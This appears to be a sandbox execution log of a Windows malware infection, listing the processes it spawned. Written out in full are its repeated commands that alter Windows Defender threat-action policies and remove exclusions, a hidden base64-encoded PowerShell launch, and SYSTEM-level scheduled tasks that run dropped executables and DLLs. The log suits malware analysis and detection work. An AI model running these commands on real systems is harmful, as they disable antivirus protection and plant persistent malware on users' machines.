C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7080
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:11312
-
C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\hHGyppt.exeC:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\hHGyppt.exe nh /site_id 754 /S1⤵PID:15616
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;"2⤵PID:14576
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:3216
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:13216
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:9828
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:11328
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:5196
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:304
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:5152
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:5232
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:3796
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:12436
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:10336
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:7876
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:13720
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:7024
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:5496
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:5560
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:16476
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:11220
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:13068
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:12072
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:14400
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cbBtQoNpOByPPTwrn" /SC once /ST 00:42:44 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\HMlrdev.exe\" V8 /site_id 754 /S" /V1 /F2⤵
- Creates scheduled task(s)
PID:9848 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "cbBtQoNpOByPPTwrn"2⤵PID:13264
-
C:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\HMlrdev.exeC:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\HMlrdev.exe V8 /site_id 754 /S1⤵PID:10896
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bWIRRaDZCpCYZHZEtf"2⤵PID:14916
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:13972
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:14568
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:9824
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:13996
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\JDaUpqLWU\HNpigb.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qTJPyBJZsADsDDd" /V1 /F2⤵
- Creates scheduled task(s)
PID:7508 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qTJPyBJZsADsDDd2" /F /xml "C:\Program Files (x86)\JDaUpqLWU\KMAANTR.xml" /RU "SYSTEM"2⤵PID:16640
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "qTJPyBJZsADsDDd"2⤵PID:16776
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "qTJPyBJZsADsDDd"2⤵PID:5728
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LMVWktnylhEgic" /F /xml "C:\Program Files (x86)\CzJsMnpmYIHU2\KJYFVfO.xml" /RU "SYSTEM"2⤵PID:16956
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LmWwWbygFrIYQ2" /F /xml "C:\ProgramData\pJxacTbbSlizmPVB\dIOleWn.xml" /RU "SYSTEM"2⤵PID:15996
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "kIaWWMRbvXNLsrwhO2" /F /xml "C:\Program Files (x86)\MMWqmhiAcXveJYezuLR\IYWmOEa.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:17864 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ChSiuBhrWLQfWhgdkuF2" /F /xml "C:\Program Files (x86)\MCoLVEAxuDhpC\OUWubHq.xml" /RU "SYSTEM"2⤵PID:6596
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "spuKeMyOOIHr" /SC once /ST 03:55:19 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\ElfugswO\GpHvEJn.exe\" U4 /S"2⤵
- Creates scheduled task(s)
PID:5856 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "spuKeMyOOIHr"2⤵PID:7148
-
C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\ElfugswO\GpHvEJn.exeC:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\ElfugswO\GpHvEJn.exe U4 /S1⤵PID:17784
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:12812
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:17160
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10848
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7484
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10700
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:11884
-
C:\Users\Admin\AppData\Roaming\fcrcjcfC:\Users\Admin\AppData\Roaming\fcrcjcf1⤵PID:5108
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:13760
-
C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\igiJETM.exeC:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\igiJETM.exe nh /site_id 754 /S1⤵PID:5036
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;"2⤵PID:6068
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:13436
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:16728
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:9204
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:6984
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:12884
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:12544
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:8316
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:7644
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:14460
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:6728
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:7588
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:13772
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:7680
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:6572
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:7240
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:1032
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:16816
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:3104
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:10056
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:13128
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:17040
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cbBtQoNpOByPPTwrn" /SC once /ST 13:22:06 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\tCbNLBR.exe\" V8 /site_id 754 /S" /V1 /F2⤵PID:2296
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "cbBtQoNpOByPPTwrn"2⤵PID:10768
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:12664
-
C:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\tCbNLBR.exeC:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\tCbNLBR.exe V8 /site_id 754 /S1⤵PID:11148
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bWIRRaDZCpCYZHZEtf"2⤵PID:8556
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:7836
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:16988
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:4452
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:10096
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\JDaUpqLWU\DVBzfs.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qTJPyBJZsADsDDd" /V1 /F2⤵PID:16848
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qTJPyBJZsADsDDd2" /F /xml "C:\Program Files (x86)\JDaUpqLWU\QONRvqG.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:15952 -
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "qTJPyBJZsADsDDd"2⤵PID:11236
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "qTJPyBJZsADsDDd"2⤵PID:4692
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LMVWktnylhEgic" /F /xml "C:\Program Files (x86)\CzJsMnpmYIHU2\QnfCgGE.xml" /RU "SYSTEM"2⤵PID:16116
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LmWwWbygFrIYQ2" /F /xml "C:\ProgramData\pJxacTbbSlizmPVB\FvodjEL.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:14548 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "kIaWWMRbvXNLsrwhO2" /F /xml "C:\Program Files (x86)\MMWqmhiAcXveJYezuLR\DEyhVzJ.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5696 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ChSiuBhrWLQfWhgdkuF2" /F /xml "C:\Program Files (x86)\MCoLVEAxuDhpC\SpFpgRc.xml" /RU "SYSTEM"2⤵PID:15776
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "spuJMLdOIPez" /SC once /ST 07:26:47 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\mYFJKsFS\bflHSrF.exe\" U4 /S"2⤵
- Creates scheduled task(s)
PID:17476 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "spuJMLdOIPez"2⤵PID:6072
-
C:\Windows\System32\CredentialUIBroker.exe"C:\Windows\System32\CredentialUIBroker.exe" AppContainer -Embedding1⤵PID:8668
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:14768
-
